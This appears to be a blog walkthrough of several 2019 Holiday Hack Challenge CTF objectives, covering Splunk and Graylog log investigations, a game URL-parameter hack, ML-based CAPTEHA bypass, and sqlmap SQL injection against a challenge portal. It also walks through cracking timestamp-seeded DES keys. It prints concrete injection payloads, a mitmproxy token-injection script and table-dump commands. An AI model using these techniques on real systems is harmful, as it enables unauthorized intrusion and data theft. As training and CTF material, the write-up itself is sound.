Hi, I’m Dr. Banas, professor of Cheerology at Elf University. This term, I’m teaching “HOL 404: The Search for Holiday Cheer in Popular Culture,” and I’ve had quite a shock! I was at home enjoying a nice cup of Gløgg when I had a call from Kent, one of my students who interns at the Elf U SOC. Kent said that my computer has been hacking other computers on campus and that I needed to fix it ASAP! If I don’t, he will have to report the incident to the boss of the SOC. Apparently, I can find out more information from this website https://splunk.elfu.org/ with the username: elf / Password: elfsocks. I don’t know anything about computer security. Can you please help me?

This time there was no terminal which needed to be fixed through some command line magic, instead you just had to browse to the URL given by Prof. Banas and follow the hints through the ElfU SOC chat interface. When you first visit, you will be greeted with the below message.

The main question to answer:

What was the message for Kent that the adversary embedded in this attack?

To get to the answer, you should rely on the training questions and the hints from SOC characters in the chat. Alice in the chat will tell you that you don’t necessarily need to solve all the training questions if you already know Splunk, you can safely skip and look for the answer to the main question. To do this you will need these 2 resources:

ElfU Splunk Search: https://splunk.elfu.org/en-GB/app/SA-elfusoc/search
ElfU File Archive: http://elfu-soc.s3-website-us-east-1.amazonaws.com/

Since I never used Splunk before, I went through the training questions anyway to learn the logic of Splunk:

Q1 - What is the short host name of Professor Banas’ computer?

This can be answered by simply paying attention to the discussion in the chat windows. If you missed it go back to the group chat called Chat with #ELFU SOC and read it again. Then you will see that the answer is sweetums.

Q2 - What is the fully path and name of the sensitive file that was likely accessed and copied by the attacker?

For this question, Alice mentioned that Prof. Banas is really close with Santa, and that they worry that the attacker who compromised the Prof’s machine may have accessed some sensitive information related to Santa. Her tip is to do a simple text search for something you are interested in, which she says can lead straight to the answer quite often. So when you search the data for any mention of santa you will get a few hits, the answer can be found within the below text:

ParameterBinding(Format-List):
name="InputObject";
value="C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt:1:Carl, you know there's no one I trust more than you to help. Can you have a look at this draft Naughty and Nice list for 2019 and let me know your thoughts? -Santa"

Q3 - What is the fully-qualified domain name(FQDN) of the command and control(C2) server?

Since these questions are meant to be for training, Alice will almost give you the correct search term straight away. In one of her messages she posted a link to a Splunk search that she did with the below parameters:

index=main sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational powershell EventCode=3

This Splunk search gave away the answer in the first search result. The C&C server’s FQDN is: 144.202.46.214.vultr.com.

Q4 - What document is involved with launching the malicious PowerShell code (provide just file name)?

For this question Alice showed a neat technique which can help filter the pool of event logs by setting a time-window of +/- 5 seconds of some interesting event at a particular point in time. Eventually she points out that you are looking for a document, so why not search for the string doc and see what comes up:

19th Century Holiday Cheer Assignment.doc

This seemed promising, however this was not accepted as the answer. Then I remembered that word documents have different extensions such as .docx, .docm and so on, so I did a Google search for PowerShell execution from Word and realized that this requires Word Macros to be enabled, which means the file should have the .docm extension. Next I tried the same search but for docm and this time and the same filename popped up, but with .docm extension, which was the correct answer: 19th Century Holiday Cheer Assignment.docm.

Q5 - How many unique email addresses were used to send Holiday Cheer essays to Professor Banas?

To answer this one, Alice gave some useful info on StoQ and a starting query as well. If you modify the query a bit to show less info, you can easily count the emails manually:

index=main sourcetype=stoq | table _time results{}.workers.smtp.to results{}.workers.smtp.subject | sort - _time

Just sort the table based on the subject line and count how many there are for subject: Holiday Cheer Assignment Submission. In total you should get 21 which is the correct answer.

Q6 - What was the password for the zip archive that contained the suspicious file?

This one you can solve very easily without many hints, if you cared to read some of the emails that Prof received from his students as part of their course submissions. The ZIP which contained the malicious word document that was locked with the password 123456789 which was mentioned in the email as well. Not very strong, nor secure…

Q7 - What email address did the suspicious file come from?

This question was answered easily if you inspected any of the emails from the previous question. The sender was bradly.buttercups@eifu.org.

Main Question

Finally, to answer the main question of Objective 6, return to Alice for some additional hints. For obvious reasons the malicious document is not available for you to inspect, but the File Archive she mentioned earlier is a good place to look if you know what to look for. She also pointed out that it contains metadata from StoQ, and also provided a search term:

index=main sourcetype=stoq "results{}.workers.smtp.from"="bradly buttercups <bradly.buttercups@eifu.org>"
| eval results = spath(_raw, "results{}")
| mvexpand results
| eval path=spath(results, "archivers.filedir.path"), filename=spath(results, "payload_meta.extra_data.filename"), fullpath=path."/".filename
| search fullpath!=""
| table filename,fullpath

The final hint from Alice will definitely lead you to the file that you need to answer the question. Can you get it?

Last thing for you today: Did you know that modern Word documents are (at their core) nothing more than a bunch of .xml files?

Of course it is the core.xml. The Splunk search she gave you shows that its path is: /home/ubuntu/archive/f/f/1/e/a/ff1ea6f13be3faabd0da728f514deb7fe3577cc4/core.xml. So now you just need to navigate to this file in the File Archive, download it and peek inside:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/"
xmlns:dcmitype="http://purl.org/dc/dcmitype/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:title>Holiday Cheer Assignment</dc:title>
<dc:subject>19th Century Cheer</dc:subject>
<dc:creator>Bradly Buttercups</dc:creator>
<cp:keywords></cp:keywords>
<dc:description>Kent you are so unfair. And we were going to make you the king of the Winter Carnival.</dc:description>
<cp:lastModifiedBy>Tim Edwards</cp:lastModifiedBy><cp:revision>4</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2019-11-19T14:54:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-19T17:50:00Z</dcterms:modified>
<cp:category></cp:category></cp:coreProperties>

You will find the secret message to Kent within the <dc:description> tag:

Kent you are so unfair. And we were going to make you the king of the Winter Carnival.

The Steam Tunnels

Sat, 28 Dec 2019 00:00:00 +0100

Hack that trail!

Instructions from the badge:

Gain access to the steam tunnels. Who took the turtle doves? Please tell us their first and last name. For hints on achieving this objective, please visit Minty’s dorm room and talk with Minty Candy Cane.

You are told you can find hints in the dorm, so you head there, but before you can enter, you need to solve the PIN at the entrance. Luckily there was an Elf who was ready to provide some hints for this:

Hey kid, it’s me, Tangle Coalbox. I’m sleuthing again, and I could use your help. Ya see, this here number lock’s been popped by someone. I think I know who, but it’d sure be great if you could open this up for me. I’ve got a few clues for you.

One digit is repeated once.

The code is a prime number.

You can probably tell by looking at the keypad which buttons are used.

To find all the primes which adhere to these constraints, I wrote a small python script that produced the below candidates:

Then I randomly tried the numbers from the bottom of the list, and the first one already opened the door. So finally you are in the dorm and you notice the same PIN is written on the wall… :D

Some hint from Minty:

Hi! I’m Minty Candycane! I just LOVE this old game! I found it on a 5 1/4” floppy in the attic. You should give it a go! If you get stuck at all, check out this year’s talks. One is about web application penetration testing. Good luck, and don’t get dysentery!

So if you click on the Terminal, it will open a browser frame with a game called The Holiday Hack Trail. You are tasked to solve it. There are 3 modes, Easy, Medium and Hard. As you increase difficulty, you need to solve the same problem with less and less resources (money). On Easy mode, it was rather trivial, on Medium it needed some effort, while on Hard I am not sure if it is possible to solve without some hacking. Instructions on the starting screen:

It's nearly time for Kringlecon.
You need to get there before the 25th day of December!
Hitch up your reindeer, gather your supplies, and do your best to make it to the North Pole on time.
Good luck!

If you select Easy mode, you will notice that the URL contains a bunch of parameters. Apparently, the game in this mode is controlled via URL parameters, which are easy to mess with

hhc://trail.hhc/store/?difficulty=0&distance=0&money=5000&pace=0&curmonth=7&curday=1&reindeer=2&runners=2&ammo=100&meds=20&food=400&name0=Ryan&health0=100&cond0=0&causeofdeath0=&deathday0=0&deathmonth0=0&name1=Vlad&health1=100&cond1=0&causeofdeath1=&deathday1=0&deathmonth1=0&name2=Jane&health2=100&cond2=0&causeofdeath2=&deathday2=0&deathmonth2=0&name3=Chris&health3=100&cond3=0&causeofdeath3=&deathday3=0&deathmonth3=0

Particularly interesting is the second parameter: distance. Turns out if you start the game, then modify this parameter, your position will suddenly jump to the position you entered for this param. The goal is to travel 8000 units of distance. If you modify it to be 7999 and then hit Go one more time, then you win straight away. On Medium and Hard modes, this hack is not available however, but for our purposes, this was enough, as solving it on Easy mode already gives you the hints necessary to progress to solving the main Objective.

You made it - congrats! Have you played with the key grinder in my room? Check it out! It turns out: if you have a good image of a key, you can physically copy it. Maybe you’ll see someone hopping around with a key here on campus. Sometimes you can find it in the Network tab of the browser console. Deviant has a great talk on it at this year’s Con. He even has a collection of key bitting templates for common vendors like Kwikset, Schlage, and Yale.

So the room which hides the entrance to the Steam Tunnels is at the end of the hallway where Minty is, and it seems you will need to do some key crafting. Also mentioned by Minty is a KringleCon talk by Deviant Ollam, about physical security around keys and how can one go about copying them.

Bitting those keys!

So once you enter the room, you will notice a small key bitting device on the table, which is useful for crafting keys. You will need it for opening the door to the Steam Tunnels, which hides in the next room, where that character is hopping into:

Before you start working on the challenge, be sure to spend a moment to appreciate the decoration. It is quite nicely done! So then when you are ready, it’s useful to consider the hint by Minty again. Minty mentioned previously, that sometimes it’s enough to have a good image of a key, in order to copy it, not necessary to have physical access. If you watched the youtube video from the hint, then you will definitely know what to do.

The last thing you need to realise is that the character hopping into the room, wears a key on his waist. If you open the Developer tools of your browser and check the source of that object you will discover that he is the Krampus and if you want to see his key properly, just visit:

https://2019.kringlecon.com/images/avatars/elves/krampus.png

Once you have the imge and get a good look at the key you can decipher it and find the correct bitting: 122520. If you enter this into the bitting machine at key.elfu.org then you will get a key which opens the entrance to the Steam Tunnels. Once you find your way to the end of the Steam Tunnel, you will meet again with Krampus Hollyfeld that is the answer to Objective 7.

Hello there! I’m Krampus Hollyfeld. I maintain the steam tunnels underneath Elf U, Keeping all the elves warm and jolly. Though I spend my time in the tunnels and smoke, In this whole wide world, there’s no happier bloke!

Frido Sleigh contest

Sat, 28 Dec 2019 00:00:00 +0100

Can I has cookiez?

After talking with Krampus in the Steam Tunnels you realise that he knows a lot about what is going on at Elf Uni. But before he is ready to share some intel, you need to earn his trust… so he asks you to win the Frido Sleigh contest which will award him with a lifetime supply of cookies. Sadly, however, the contest uses a CAPTEHA challenge, which stands for Completely Automated Public Turing test to tell Elves and Humans Apart. Krampus is not an elf, and neither are you, so you may need to use something advanced enough that can fool the CAPTEHA and let you bypass it …

But, before I can tell you more, I need to know that I can trust you. Tell you what – if you can help me beat the Frido Sleigh contest (Objective 8), then I’ll know I can trust you. The contest is here on my screen and at fridosleigh.com. No purchase necessary, enter as often as you want, so I am! They set up the rules, and lately, I have come to realize that I have certain materialistic, cookie needs. Unfortunately, it’s restricted to elves only, and I can’t bypass the CAPTEHA. (That’s Completely Automated Public Turing test to tell Elves and Humans Apart.) I’ve already cataloged 12,000 images and decoded the API interface. Can you help me bypass the CAPTEHA and submit lots of entries?

Links from the hint:

Frido Sleigh Contest: https://fridosleigh.com/
CAPTEHA images: https://downloads.elfu.org/capteha_images.tar.gz
Python tool to interact with the API: https://downloads.elfu.org/capteha_api.py

Basically, your task is to use Machine Learning in order to train a model that can predict the category for every image in the CAPTEHA challenge and use this to submit the correct response before the CAPTEHA times out. The python script provided is of great use, but the core ML code is missing and it is not trivial to implement. Lucky for you, there is a KringleCon talk about Machine Learning for Security, which points to a Github Repository with some very useful code for this missing part:

https://github.com/chrisjd20/img_rec_tf_ml_demo

This library implements image recognition based on Machine Learning with TensorFlow, and it is almost a copy paste solution for this CAPTEHA python script that has some missing parts. You just need to train the model on the 12000 sample images provided by Krampus. The repo provides the training source code, as well as the prediction you can reuse in the script for interacting with the Frido Sleigh API.

A complete solution can be found in my GitHub repo. Most important part is the integrated ML section:

graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
labels = load_labels("/tmp/retrain_tmp/output_labels.txt")
# Load up our session
input_operation = graph.get_operation_by_name("import/Placeholder")
output_operation = graph.get_operation_by_name("import/final_result")
sess = tf.compat.v1.Session(graph=graph)
# Can use queues and threading to spead up the processing
q = queue.Queue()
#Going to interate over each of our images.
for image in b64_images:
image_uuid = image["uuid"]
print('Processing Image {}'.format(image_uuid))
# We don't want to process too many images at once. 10 threads max
while len(threading.enumerate()) > 10:
time.sleep(0.0001)
#predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
image_bytes = base64.b64decode(image["base64"])
threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, image_uuid, labels, input_operation, output_operation)).start()
print('Waiting For Threads to Finish...')
while q.qsize() < len(b64_images):
time.sleep(0.001)
#getting a list of all threads returned results
prediction_results = [q.get() for x in range(q.qsize())]
#do something with our results... Like print them to the screen.
predicted_uuids = []
for prediction in prediction_results:
if prediction['prediction'] in challenge_image_types:
predicted_uuids.append(prediction['image_uuid'])

When you run the script, don’t forget to edit the yourREALemailAddress variable as the Frido Sleigh contest will send you the code at this real email address.

Once you receive the email from them, it will contain a code that you have to enter in your personal badge for solving this objective. Looks something like this: 8Ia8LiZEwvyZr2WO. After you submit it, Krampus will finally know that he can trust you, and is now ready to share some further information with you:

You did it! Thank you so much. I can trust you! To help you, I have flashed the firmware in your badge to unlock a useful new feature: magical teleportation through the steam tunnels. As for those scraps of paper, I scanned those and put the images on my server. I then threw the paper away. Unfortunately, I managed to lock out my account on the server. Hey! You’ve got some great skills. Would you please hack into my system and retrieve the scans? I give you permission to hack into it, solving Objective 9 in your badge. And, as long as you’re traveling around, be sure to solve any other challenges you happen across.

Paper Scraps Hunting

Sat, 28 Dec 2019 00:00:00 +0100

Graylog to the rescue

After solving the CAPTEHA and winnit a lifetime supply of cookiez for Krampus, he provided you with some further clues. He first pointed you to some paper scraps he found in the vents, which he collected by using the Turtle Doves… Then he mentions that he stored some scanned copies of the paper scrps on his server at: studentportal.elfu.org. However, he forgot his access credentials, so he asked you to hack your way in and retrieve those images:

Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there. What is the name of Santa’s cutting-edge sleigh guidance system? For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.

If you need, you can get further hints by visiting Pepper Minstix in the dormitory. Luckily you don’t need to walk anymore, as Krampus updated your badge with a new firmware, that lets you teleport within the Elf University Campus… How cool is that!

Once you talk with Minstix, he says hge will help you out, but only after you help him with some issue he is facing:

It’s me - Pepper Minstix. Normally I’m jollier, but this Graylog has me a bit mystified. Have you used Graylog before? It is a log management system based on Elasticsearch, MongoDB, and Scala. Some Elf U computers were hacked, and I’ve been tasked with performing incident response. Can you help me fill out the incident response report using our instance of Graylog? It’s probably helpful if you know a few things about Graylog. Event IDs and Sysmon are important too. Have you spent time with those? Don’t worry - I’m sure you can figure this all out for me! Click on the All messages Link to access the Graylog search interface! Make sure you are searching in all messages! The Elf U Graylog server has an integrated incident response reporting system. Just mouse-over the box in the lower-right corner. Login with the username elfustudent and password elfustudent.

To solve this technical challenge, you need to get familiar with Graylog. You can do this either via the in-game terminal or by browsing to graylog.elfu.org in a new tab. In order to submit your answers though, you need to open the terminal and hover over the bottom right corner or the input forms to appear (also available at this link). For the information gathering it may be easier to navigate to the service in a separate browser tab.

To get the hints, you will need to answer these 10 questions below:

Q1 - What is the path and filename of the first malicious file downloaded by Minty?

This can be easily found by searching for the username minty, enabling TargetFileName column and browsing through the log entries later in time (towards the end of all logs available). This will eventually lead you the following answer C:\Users\minty\Downloads\cookie_recipe.exe.

Q2 - What was the ip:port the malicious file connected to first?

Within the same search results, enable columns DesinationIpAddress and DestinationPort and look for values that seem anomalous. I found the IP 192.168.247.175 and ports 4443 and 4444 that seemed out of the ordinary, so I tried and the combination 192.168.247.175:4444 was accepted as correct answer.

Q3 - What was the first command executed by the attacker?

If you examine the log entry right after the one which was proiding the IP and Port for the previous answer, you will see this CommandLine property: C:\Windows\system32\cmd.exe /c “whoami “. Seems awfully suspicious, and indeed it holds the correct answer: whoami.

Q4 - What is the one-word service name the attacker used to escalate privileges?

So to answer this I first had to Google how services can be started on Windows systems, and found that it is usually done by calling some command that stats like sc start … so I searched the Graylog server for this string and found a lot of entries involving the webexservice which was the correct answer.

Q5 - What is the path & filename of the binary ran by the attacker to dump credentials?

For this question you should search for text exe and within the results look for the string password. You should find a suspiciously named .exe called by someone, which holds the correct answer: C:\cookie.exe.

Q6 - Which account name was used to pivot to another machine?

To answer this, you should notice that not all log entries have the AccountName value, so you should search for exists: AccountName which returns log entries where this value exists. In the results you will find minty quite often but this would not be accepted, so try some others from the results, perhaps alabaster will work… :)

Q7 - What is the time (HH:MM:SS) the attacker makes a Remote Desktop connection to another machine?

For this I had to learn that in Windows environment the act of opening a remote connection via RDP causes an event to be generated with ID of 4624 and LogonType 10, so I searched for these values in Graylog with EventID: 4624 AND LogonType:10 and found the correct timestamp to be: 06:04:28.

Q8 - What is the ‘SourceHostName,DestinationHostname,LogonType’ of this connection?

For answering this question, you should look for LogonType 3 and the existence of Source and Destination hostnames. I made the following search query: LogonType: 3 AND exists:SourceHostName AND exists:DestinationHostname which gave the following solution: ELFU-RES-WKS2,elfu-res-wks3,3 (after several rounds of trial and error based on search results).

Q9 - What is the path & filename of the secret document being transferred from the third host to the second host?

First you should look for the account alabaster because the attacked was disguised under this attack, then look in the result and look for a pdf file that seems suspicious. Correct answer will be: C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf.

10 - What is the IPv4 address the secret research document was exfiltrated to?

To answer this, I listed all log entries, went the the very and and turned on CommandLine and TargetIpAddress columns, in order to see that PowerShell command was used to upload this secret pdf to some website. This revealed the target IP address: 104.22.3.84.

So now the questions are answered and Pepper is ready to share some useful hints:

That’s it - hooray! Have you had any luck retrieving scraps of paper from the Elf U server? You might want to look into SQL injection techniques. OWASP is always a good resource for web attacks. For blind SQLi, I’ve heard Sqlmap is a great tool. In certain circumstances though, you need custom tamper scripts to get things going!

Main objective

So Pepper Minstix hinted at the tool called sqlmap which can help us exploit vulnerable databases tied to web applications that accept input from the users. This is quite a valuable hint. Further information in the hint include:

The given target (studentportal.elfu.org) has several endpoints, which could be targeted with a Web App exploit:

studentportal.elfu.org/index.php
studentportal.elfu.org/students.php
studentportal.elfu.org/apply.php
studentportal.elfu.org/check.php

The first and the second do not accept any input, so they are not going to be very useful for this objective, however the apply.php and check.php do accept user input through HTML forms. Of these two, I first decided to take a look at the latter, as it only has one input field, which can be enough for the purpose. Do note that the HTML form in the check.php endpoint has a different target specified: application-check.php, so the sqlmap attack should be directed to this URL instead of check.php.

<form id="check" action="/application-check.php" method="get" onsubmit="submitApplication()">
<h1>Check Application Status</h1>
<div>
<label for="inputEmail">Elf Mail Address</label>
<input name="elfmail" type="email" id="inputEmail" placeholder="Email address" required="" autofocus="">
</div>
<input type="hidden" id="token" name="token" value="">
<div>
<input type="submit" value="Check Status">
</div>
</form>

In the HTML source code, notice that the submission form also has a hidden field called token, that also gets sent along the request when the button is clicked. Searching a bit further in the page source you can see a short javascript code which handles the update of this input field and the actual form submission:

function submitApplication() {
console.log("Submitting");
elfSign();
document.getElementById("check").submit();
}
function elfSign() {
var s = document.getElementById("token");
const Http = new XMLHttpRequest();
const url='/validator.php';
Http.open("GET", url, false);
http.send(null);
if (Http.status === 200) {
console.log(Http.responseText);
s.value = Http.responseText;
}
}

So now you know that when you call sqlmap and attack elfmail, you also need to set up some kind script that automatically fetches the token and inserts it into the requests, as it will be rejected otherwise. My first idea was to write a tamper script for sqlmap, which defines the custom transformation that inserts the token into the payload of each request. However, for some reason I could not get this tamper script to work, I always received Invalid or expired token error for every request generated by sqlmap.

So next, I looked around on the net for an alternative solution, and found the mitmproxy tool which has a nice python API that helped with the token injection. The github repo for the mitmproxy project has several useful examples, which helped me learn enough of the API to get going with the token injecting service. The script I used was very simple and easy to understand:

from mitmproxy import http
import requests
def request(flow: http.HTTPFlow) -> None:
# obtain the token from the validator.php endpoint
r = requests.get("https://studentportal.elfu.org/validator.php")
# insert the token into the request that is intercepted by mitmproxy
flow.request.query["token"] = r.content.decode("utf-8")

Below is a sample screenshot of the mitmproxy console when looking at a sample request that was already injected with the necessary token:

Now that the proxy is set up (IP: 192.168.56.7, PORT: 8080), it was time to let sqlmap loose on the database and find some vulnerabilities. To start the scan you need to run the following command specifying the URL and the query parameter you want to exploit (which was -p elfmail in this case):

~/sqlmap ▶ python sqlmap.py --proxy='http://192.168.56.7:8080' --url="https://studentportal.elfu.org/application-check.php?elfmail=email@example.com" -p elfmail -risk 3
___
__H__
___ ___[.]_____ ___ ___ {1.3.12.34#dev}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
 |_|V... |_| http://sqlmap.org

[*] starting @ 10:40:06 /2020-01-01/

[10:40:06] [INFO] testing connection to the target URL
[10:40:09] [INFO] target URL content is stable
[10:40:10] [INFO] heuristic (basic) test shows that GET parameter 'elfmail' might be injectable (possible DBMS: 'MySQL')
[10:40:11] [INFO] heuristic (XSS) test shows that GET parameter 'elfmail' might be vulnerable to cross-site scripting (XSS) attacks
[10:40:11] [INFO] testing for SQL injection on GET parameter 'elfmail'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n]
[10:40:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:40:31] [INFO] GET parameter 'elfmail' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your application is still pending!")
[...REDACTED FOR BREVITY...]
[10:46:19] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
GET parameter 'elfmail' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 279 HTTP(s) requests:
---
Parameter: elfmail (GET)
 Type: boolean-based blind
 Title: AND boolean-based blind - WHERE or HAVING clause
 Payload: elfmail=asd' AND 7313=7313 AND 'PMOS'='PMOS

 Type: error-based
 Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
 Payload: elfmail=asd' AND (SELECT 1941 FROM(SELECT COUNT(*),CONCAT(0x716b626b71,(SELECT (ELT(1941=1941,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'EUey'='EUey

 Type: time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
 Payload: elfmail=asd' AND (SELECT 1748 FROM (SELECT(SLEEP(5)))MzkM) AND 'qFnu'='qFnu
---
[10:59:36] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.1, Nginx 1.14.2
back-end DBMS: MySQL >= 5.0

Now you can see that sqlmap, in cooperation with the mitmproxy, successfully identified the DB type and found 3 vulnerabilities in the elfmail input field:

boolean-based blind
error-based
time-based blind

Next you can use sqlmap explore the database further. Passing the flag –dbs to the same command as before will list all databases, while the flag –tables will list all the tables within a chosen database. Once you found the correct combination of flags, you can use the flag –dump to dump the table’s content. In this case these flags worked to find the paper scraps:

~/sqlmap ▶ python3 sqlmap.py --proxy=[...] --url=[...] -p elfmail -D elfu -T krampus --dump
database: elfu
Table: krampus
[6 entries]
+----+-----------------------+
| id | path |
+----+-----------------------+
| 1 | /krampus/0f5f510e.png |
| 2 | /krampus/1cc7e121.png |
| 3 | /krampus/439f15e6.png |
| 4 | /krampus/667d6896.png |
| 5 | /krampus/adb798ca.png |
| 6 | /krampus/ba417715.png |
+----+-----------------------+

Prepending the file names from the exfiltrated table with the site’s URL will finally reveal the paper scraps. Once you download and reassemble all of them, you can read the full text of the letter and answer the objective.

wget https://studentportal.elfu.org/krampus/0f5f510e.png
wget https://studentportal.elfu.org/krampus/1cc7e121.png
wget https://studentportal.elfu.org/krampus/439f15e6.png
wget https://studentportal.elfu.org/krampus/667d6896.png
wget https://studentportal.elfu.org/krampus/adb798ca.png
wget https://studentportal.elfu.org/krampus/ba417715.png

What is the name of Santa’s cutting-edge sleigh guidance system?:

Super Sled-o-matic

Recover Cleartext Document

Sat, 28 Dec 2019 00:00:00 +0100

Hidden in the Mongo

Instructions in your personal badge:

The Elfscrow Crypto tool is a vital asset used at Elf University for encrypting SUPER SECRET documents. We can’t send you the source, but we do have debug symbols that you can use. Recover the plaintext content for this encrypted document. We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC. What is the middle line on the cover page? (Hint: it’s five words) For hints on achieving this objective, please visit the NetWars room and talk with Holly Evergreen.

Links in the objective:

First is a Windows executable, which can be used to perform encryption on arbitrary input and observe output. The second is a file for storing debugging information about a the encryption tool itself (this will help you mitigate the lack of access to its source code), and finally the encrypted document which you need to decipher.

For further hints you may approach Holly Evergreen in the NetWars room, but he will only reveal them if you help him solve some issues with his terminal first!

Hey! It’s me, Holly Evergreen! My teacher has been locked out of the quiz database and can’t remember the right solution. Without access to the answer, none of our quizzes will get graded. Can we help get back in to find that solution? I tried lsof -i, but that tool doesn’t seem to be installed. I think there’s a tool like ps that’ll help too. What are the flags I need? Either way, you’ll need to know a teensy bit of Mongo once you’re in. Pretty please find us the solution to the quiz!

Now, you should click on the terminal near Holly and dive into the console to help him recover the quiz material he is after:

Hello dear player! Won't you please come help me get my wish!
I'm searching teacher's database, but all I find are fish!
Do all his boating trips effect some database dilution?
It should not be this hard for me to find the quiz solution!
Find the solution hidden in the MongoDB on this system.
elf@e496ebfb254b:~$ netstat -a -n -o
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 127.0.0.1:12121 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:54372 127.0.0.1:12121 TIME_WAIT timewait (7.43/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 168482939 /tmp/mongodb-12121.sock
elf@e496ebfb254b:~$ mongo --port 12121
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:12121/
MongoDB server version: 3.6.3
Welcome to the MongoDB shell.
>

So the hint in the terminal says that the database backend is MongoDB, and so you should first use netstat to find out the port on which the mongod is listening on, then connect to it. Now you are in the mongo shell ready to poke around to find the answer:

> show dbs
admin 0.000GB
config 0.000GB
elfu 0.000GB
local 0.000GB
test 0.000GB
> use elfu
switched to db elfu
> show tables
bait
chum
line
metadata
solution
system.js
tackle
tincan
> db.solution.find()
{ "_id" : "You did good! Just run the command between the stars: ** db.loadServerScripts();displaySolution(); **" }
> db.loadServerScripts()
> displaySolution()
.
__/ __
/
/.'o'.
.*.'.
 .'.'*'.
*'.o.'.*.
.'.*.'.'.*.
 .o.'.*.'.*.'.
[_____]
___/
Congratulations!!

So with this the technical challenge in Holly’s terminal is solved, he is ready to provide you with some useful hints for solving Objective:

Woohoo! Fantabulous! I’ll be the coolest elf in class. On a completely unrelated note, digital rights management can bring a hacking elf down. That ElfScrow one can really be a hassle. It’s a good thing Ron Bowes is giving a talk on reverse engineering! That guy knows how to rip a thing apart. It’s like he breathes opcodes!

So his best hint points you to a youtube video from Ron Bowes who has a KringleCon talk. This is definitely a very good hint, be sure to watch it!

Reverse crypto - Main Objective

To kick off the crypto fun, let’s call the elfscrow.exe right away, to see how it can be used.

C:\Users\admin\Desktop\elfscrow> elfscrow.exe
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!
Are you encrypting a file? Try --encrypt! For example:
elfscrow.exe --encrypt <infile> <outfile>
You'll be given a secret ID. Keep it safe! The only way to get the file
back is to use that secret ID to decrypt it, like this:

 elfscrow.exe --decrypt --id=<secret_id> <infile> <outfile>

You can optionally pass --insecure to use unencrypted HTTP. But if you
do that, you'll be vulnerable to packet sniffers such as Wireshark that
could potentially snoop on your traffic to figure out what's going on!

This last sentence seems to invite you to do exactly what it warns against. While running the program with the –insecure flag and sniffing network traffic with Wireshark, I could not find any vulnerabilities however. It seems that the key ID, useful to retrieve it from the server, is generated quite unpredictably. Thus, instead of attacking the key ID you should attack the algorithm that generates the key for encryption/decryption.

As mentioned in the objective, the file you need to decrypt was encrypted sometime between 7-9pm on December 6th, 2019 UTC. As such, the plan was to gather enough information to generate the same key that was used to encrypt the file. For this I had to do some further reconnaissance in IDA Pro, so I fired it up with the provided .pdb file.

After a few minutes of poking around in the GUI, I did a string search for generate and found the sub-routine called generate_key that seemed interesting. I spent some time studying it and find the highlighted parts quite interesting on the below screenshot:

It seems that in order to generate the key, it uses the timestamp as a seed to the random number generator. Pretty useful observation. Next I notice a loop, that executes 8 times and generates 8 bits of random data on each iteration, so this suggests that it may be using DES encryption algorithm and thus a 64 bit key. To generate the random key, this sub-routine makes a call to super_secure_random on each iteration of the loop, as seen on the below figure:

This sub-routine has some constants, for which I do some Google searches to reveal that these are used in Linear Congruential Generator algorithms (LCG for short - link). Then I searched for some example implementations of this algorithm, and found a very useful website, which has the same algorithm implemented in many different languages. As I like to work with Go, I decided to choose this implementation and go from there.

To see if my code is correct, when it generates a key based on a given seed, I execute the elfscrow.exe once more and noted the values in its output:

C:\> elfscrow.exe --insecure --encrypt elfscrow.pdb encrypted_elfscrow.pdb.enc
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!
Our miniature elves are putting together random bits for your secret key!
Seed = 1577895929 << NOTE THIS
Generated an encryption key: 09f384150bdb41ba (length: 8) << AND THIS
...

Next, I fed the same seed into the algorithm I put together to generate a key for DES, and observed the same key output:

~/elfscrow ▶ go run lcg.go
Seed: 1577895929
Key: 09f384150bdb41ba

It seems that the key, generated by my code, is the same that was output in the windows command line terminal after executing elfscrow.exe on a sample file. This is good news! Next, I looked on the Internet for an example implementation of DES decryption in Go and found a good solution on StackOverflow… as usual!

Finally, I integrated this Go code for DES decryption with my key generation Go code, and created a tool that loops through every second of the given time interval, generates the corresponding key and uses it for decrypting the given file. If the resulting plain-text is a valid PDF - the plain-text result starts with %PDF - it will save the result to a pdf file on disk. The program takes around 2-3 minutes to finish iterating through every second of the given time interval, but eventually it successfully recovers the pdf file. The timestamp for when the encryption happened is:

12/06/2019 @ 8:20pm (UTC) - 1575663650

This code can be found in a Github repo I created.

~/elfscrow ▶ go run des-go.go
